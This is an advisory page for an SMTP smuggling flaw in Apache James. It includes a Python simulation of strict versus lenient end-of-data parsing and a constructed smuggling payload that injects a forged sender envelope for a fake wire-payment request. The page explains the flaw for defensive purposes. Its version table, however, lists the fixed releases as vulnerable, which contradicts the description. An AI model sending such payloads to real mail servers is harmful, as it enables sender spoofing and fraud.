CVE-2023-51747
Severity CVSS v4.0:
Pending analysis
Type:
CWE-20
Input Validation
Publication date:
27/02/2024
Last modified:
05/05/2025
Description
Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling.

Lenient handling of line delimiters can create a difference of interpretation between the sending and the receiving server: the receiver terminates the DATA transaction at a sequence (for example a bare LF around the lone dot) that the sender did not treat as end-of-data, so the bytes that follow are parsed as new SMTP commands. An attacker can exploit this to forge an SMTP envelope, for instance to bypass SPF checks.

The patch enforces CRLF as the line delimiter during the DATA transaction.

We recommend that James users upgrade to non-vulnerable versions.
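The difference of interpretation described above, as an added example that is not Apache James code: a small Python model of a receiving server's DATA handling, run once with the strict RFC 5321 terminator (CRLF.CRLF only) and once with a lenient terminator that also accepts bare CR or LF around the dot. The relay topology, the addresses and the message bytes are constructed for illustration.

```python
"""Model of SMTP DATA end-of-message detection: strict (CRLF.CRLF only)
versus lenient (a bare CR or LF also accepted as line delimiter).

Added example, not code from the Apache James project. Addresses and
message content below are constructed for illustration.
"""
import re
from typing import List, NamedTuple

# RFC 5321 end-of-data: a line holding a single dot, lines delimited by CRLF.
STRICT_END = re.compile(rb"\r\n\.\r\n")
# Lenient variant: a bare CR or LF is also accepted as a line delimiter on
# either side of the dot. This is the class of behaviour the CVE describes.
LENIENT_END = re.compile(rb"(?:\r\n|\r|\n)\.(?:\r\n|\r|\n)")


class Envelope(NamedTuple):
    mail_from: str
    rcpt_to: str
    body: bytes


def _address(line: bytes, prefix: bytes) -> str:
    """Extract the address from 'MAIL FROM:<a@b>' / 'RCPT TO:<a@b>'."""
    return line[len(prefix):].strip().strip(b"<>").decode("ascii")


def receive_session(mail_from: str, rcpt_to: str, stream: bytes,
                    terminator: re.Pattern) -> List[Envelope]:
    """Replay what a receiving server does from the moment it has replied
    354 to DATA. `stream` is every byte the client sends afterwards.
    Dot-unstuffing is omitted; it does not affect where DATA ends."""
    messages: List[Envelope] = []
    buf = stream
    while True:
        # Prepend CRLF so a terminator at the very start (empty body) matches.
        m = terminator.search(b"\r\n" + buf)
        if m is None:
            raise ValueError("DATA never terminated")
        messages.append(Envelope(mail_from, rcpt_to, buf[:max(m.start() - 2, 0)]))
        rest = buf[m.end() - 2:]
        # Anything after the terminator is parsed as fresh SMTP commands.
        mail_from = rcpt_to = ""
        lines = rest.split(b"\r\n")
        for i, line in enumerate(lines):
            cmd = line.upper()
            if cmd.startswith(b"MAIL FROM:"):
                mail_from = _address(line, b"MAIL FROM:")
            elif cmd.startswith(b"RCPT TO:"):
                rcpt_to = _address(line, b"RCPT TO:")
            elif cmd == b"DATA":
                buf = b"\r\n".join(lines[i + 1:])
                break
        else:
            return messages  # no further DATA transaction in the stream


# Constructed DATA payload as the attacker submits it to an outbound relay
# that recognises only CRLF.CRLF and forwards the bytes unchanged. From the
# relay's CRLF-delimited view, the line "\n." does not start with a dot, so
# it is not dot-stuffed either.
SMUGGLED = (
    b"From: attacker@example.com\r\n"
    b"To: victim@example.net\r\n"
    b"Subject: hello\r\n"
    b"\r\n"
    b"benign body\r\n"
    b"\n.\r\n"                       # LF.CRLF: not a terminator for strict, is one for lenient
    b"MAIL FROM:<ceo@example.net>\r\n"
    b"RCPT TO:<victim@example.net>\r\n"
    b"DATA\r\n"
    b"From: ceo@example.net\r\n"
    b"Subject: urgent wire\r\n"
    b"\r\n"
    b"please pay\r\n"
    b".\r\n"                         # the only terminator the relay honours
)

ORIGINAL_FROM = "attacker@example.com"
ORIGINAL_TO = "victim@example.net"

if __name__ == "__main__":
    for name, pattern in (("strict", STRICT_END), ("lenient", LENIENT_END)):
        for env in receive_session(ORIGINAL_FROM, ORIGINAL_TO, SMUGGLED, pattern):
            print(f"{name}: MAIL FROM=<{env.mail_from}> RCPT TO=<{env.rcpt_to}> "
                  f"body={len(env.body)} bytes")
```

With the strict terminator the receiver accepts one message whose body merely contains the text `MAIL FROM:<ceo@example.net>`. With the lenient terminator it accepts two: the second carries an envelope sender the attacker never authenticated as, and because the bytes arrive from the relay's IP, an SPF check on that forged MAIL FROM passes whenever the relay is authorised for the forged domain. Enforcing CRLF as the only line delimiter inside DATA, as the patch does, removes the second interpretation.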
Impact
Base Score 3.x
7.10
Severity 3.x
HIGH
Vulnerable products and versions
| CPE | From | Up to |
|---|---|---|
| cpe:2.3:a:apache:james:3.7.5:*:*:*:*:*:*:* | | |
| cpe:2.3:a:apache:james:3.8.1:*:*:*:*:*:*:* | | |
References to Advisories, Solutions, and Tools
- http://www.openwall.com/lists/oss-security/2024/02/27/4
- https://lists.apache.org/thread/rxkwbkh9vgbl9rzx1fkllyk3krhgydko
- https://postfix.org/smtp-smuggling.html
- https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/